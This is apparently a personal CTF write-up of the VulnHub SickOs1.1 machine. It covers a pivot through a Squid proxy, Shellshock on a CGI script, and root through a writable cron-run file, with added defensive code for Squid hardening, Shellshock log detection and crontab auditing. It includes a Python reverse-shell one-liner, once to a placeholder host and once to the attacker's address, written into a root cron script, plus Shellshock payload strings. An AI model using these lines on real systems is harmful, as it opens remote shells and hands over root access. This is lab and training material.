VulnHub – SickOs1.1
As I'm waiting for my OSCP exam, and my lab time there is over, I took a trip to VulnHub to see if they had any new VM that looked interesting.
Name........: SickOs1.1
Date Release: 11 Dec 2015
Author......: D4rk
Series......: SickOs
Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt
Tester(s)...: h1tch1
Twitter.....: https://twitter.com/D4rk36
This CTF gives a clear analogy of how hacking strategies can be performed on a network to compromise it in a safe environment. This VM is very similar to the labs I faced in OSCP. The objective is to compromise the network/machine and gain administrative/root privileges on it.
That sounds about right, let's have a go.
Imported the VM and booted it up, taking note of the VM's MAC address so I could find it among all the other running machines. 🙂 Then I fired up a quick nmap to see what's going on.
I immediately thought about the predictable PRNG brute-force SSH exploit, but since I didn't know any usernames yet, and it would be too simple to gain root that way, I started looking into Squid. After a little while I came up short: no promising exploit, so I started to rethink. What if I could use Squid as a proxy to reach other services on the machine?
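The defender's side of that Squid idea, as an added illustration that is not the SickOs configuration (the post does not show it): a squid.conf excerpt with the permissive rule that lets any client relay through the proxy to services listening on the proxy host's own loopback, beside the rules that close that path. The listening port and the client subnet are assumptions.

```conf
# Illustrative squid.conf excerpt; port and subnet are assumed values.
http_port 3128

acl localnet src 10.0.2.0/24          # the clients the proxy is meant to serve (assumed)
acl to_localhost dst 127.0.0.0/8 ::1  # destinations that are the proxy host itself

# Weak: a single allow-all lets a client ask the proxy to fetch
# http://127.0.0.1/ and so reach a web server bound only to loopback.
# http_access allow all

# Corrected: refuse requests aimed at the proxy host, then admit only the
# intended clients, and deny everything else. Order matters: Squid applies
# the first http_access line that matches.
http_access deny to_localhost
http_access allow localnet
http_access deny all
```

The to_localhost ACL covers loopback only; services bound to the host's LAN address would need that address added to a dst ACL as well, since a client can name the proxy's own IP as the destination just as easily.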
After some fiddling around, I got the BLEHHH!!! message. Well, I guess I'm on the right track. Let's fire up my favourite first enumeration tool for web servers: Nikto.
Notice the highlighted text: Shellshock. This should be fun.
On a side track, I did have a look at the robots.txt file and found Wolf CMS. There are some exploits out there for it, but I couldn't determine the version it was running, so I explored Shellshock first, which I guess was a smart move.
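From the detection side, here is an added example (my own code, not from the post or from Nikto) of what a Shellshock attempt looks like in a web server's log and how to pick it out. Shellshock abuses bash exporting a function definition through an environment variable, so every attempt carries the "() {" prefix in some header the CGI turns into an environment variable. The log lines below are constructed in Apache combined format; the client address and request paths are made up.

```python
import re

# Constructed Apache "combined" log lines; none come from the SickOs box.
SAMPLE_LOG = """\
10.0.2.15 - - [11/Dec/2015:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.2.15 - - [11/Dec/2015:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo shellshock-test"
10.0.2.15 - - [11/Dec/2015:10:02:11 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "curl/7.47.0"
10.0.2.15 - - [11/Dec/2015:10:02:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() {:; }; echo x" "-"
garbage line that does not parse but still carries () { :;}; in it
"""

# Combined log format: ip ident user [ts] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# The bash function-export prefix "() {", with optional whitespace between
# the parentheses and the brace, is the common denominator of every variant.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

FIELDS = ("request", "referer", "agent")


def find_shellshock_attempts(log_text):
    """Return (line_no, client_ip, field) for each line carrying the signature.

    Lines that do not parse as combined format are still searched whole and
    reported with field 'raw', so a malformed request cannot hide from the scan.
    """
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = COMBINED_RE.match(line)
        if m is None:
            if SHELLSHOCK_RE.search(line):
                hits.append((n, line.split(" ", 1)[0], "raw"))
            continue
        for field in FIELDS:
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((n, m.group("ip"), field))
                break
    return hits


if __name__ == "__main__":
    for line_no, ip, field in find_shellshock_attempts(SAMPLE_LOG):
        print(f"line {line_no}: Shellshock pattern from {ip} in {field}")
```

Running it over the sample reports lines 2, 4 and 5; on a real box the fix is a patched bash, and a hit in the log after patching is still worth knowing about because it tells you who is probing your CGI scripts.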
There we go, we got a limited shell. After doing some enumeration, I got lucky quite quickly. Crontab is one of the first things I look for, and crontab is usually a quick win.
And even better, full write permission on the file. Grab the python shell from http://pentestmonkey.net/
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Rewrite it to fit my needs, and echo it to the file.
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.2.214\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > /var/www/connect.py
And from there it's just sit and wait for your root shell 🙂
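The whole privilege escalation above rests on one misconfiguration: a cron job running as root executes a file that a low-privileged user can write. As an added example (my own code, not from the post), here is a small audit that parses a system-style crontab, finds the absolute paths each job references, and flags any that are group- or world-writable. The crontab text is constructed; the post only tells us the job ran /var/www/connect.py, so the schedule, interpreter and the other two jobs are assumptions. The script stages its own throwaway directory tree so it runs offline, and the `root=` parameter lets you point it at a mounted image instead of the live system.

```python
import os
import re
import stat
import tempfile

# Constructed /etc/crontab; schedule and extra jobs are assumed, not from SickOs.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *  root  python /var/www/connect.py
*/5 * * * * root /usr/local/bin/backup.sh
"""

SYSTEM_CRONTAB_FIELDS = 7  # five schedule fields, the user, then the command


def parse_system_crontab(text):
    """Yield (user, command) for each job line; skip comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, SYSTEM_CRONTAB_FIELDS - 1)
        if len(parts) < SYSTEM_CRONTAB_FIELDS:
            continue  # malformed or user-crontab style line; not handled here
        yield parts[5], parts[6]


def referenced_paths(command):
    """Absolute paths mentioned anywhere in a cron command (scripts, interpreter args)."""
    return re.findall(r"(?<![\w/])/[\w./-]+", command)


def writable_by_others(path):
    """True when the file exists and group or world has write permission.

    cron runs the job as the listed user, so whoever can edit the file can run
    code as that user; for root jobs that is a full privilege escalation.
    """
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(text, root="/"):
    """Return [(user, path)] for jobs whose referenced file is writable by others.

    root is prefixed to every path so the audit can run against a staged tree
    or a mounted disk image rather than the live filesystem.
    """
    findings = []
    for user, command in parse_system_crontab(text):
        for path in referenced_paths(command):
            real = os.path.join(root, path.lstrip("/"))
            if writable_by_others(real):
                findings.append((user, path))
    return findings


def stage_demo_tree():
    """Create a temp tree mirroring the sample crontab: connect.py world-writable
    (the weak case from the post), backup.sh owner-writable only."""
    root = tempfile.mkdtemp()
    for rel, mode in (("var/www/connect.py", 0o777), ("usr/local/bin/backup.sh", 0o755)):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(full, mode)
    return root


if __name__ == "__main__":
    demo_root = stage_demo_tree()
    for user, path in audit_crontab(SAMPLE_CRONTAB, root=demo_root):
        print(f"[!] cron job runs as {user} but {path} is writable by others")
```

The fix on a real system is the obvious one: scripts referenced from root cron jobs should be owned by root with mode 0755 or tighter, and the directories leading to them should not be writable by the web server user either, since a writable parent directory lets the file be replaced even when the file itself is locked down.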
That was a quick and fun win, while waiting for the OSCP 🙂